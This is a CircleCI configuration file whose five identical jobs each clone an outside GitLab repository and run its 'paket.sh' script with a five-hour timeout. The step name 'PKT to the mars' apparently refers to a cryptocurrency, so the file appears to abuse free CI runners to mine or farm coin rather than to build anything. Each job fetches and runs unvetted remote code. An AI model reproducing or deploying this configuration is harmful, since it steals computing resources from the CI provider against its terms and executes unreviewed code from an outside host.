version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
            no_output_timeout: 5h
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
            no_output_timeout: 5h
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
            no_output_timeout: 5h
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3   
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
            no_output_timeout: 5h
    Devop4:
      docker:
            - image: circleci/ruby:2.5.3    
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
            no_output_timeout: 5h
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3
            - Devop4
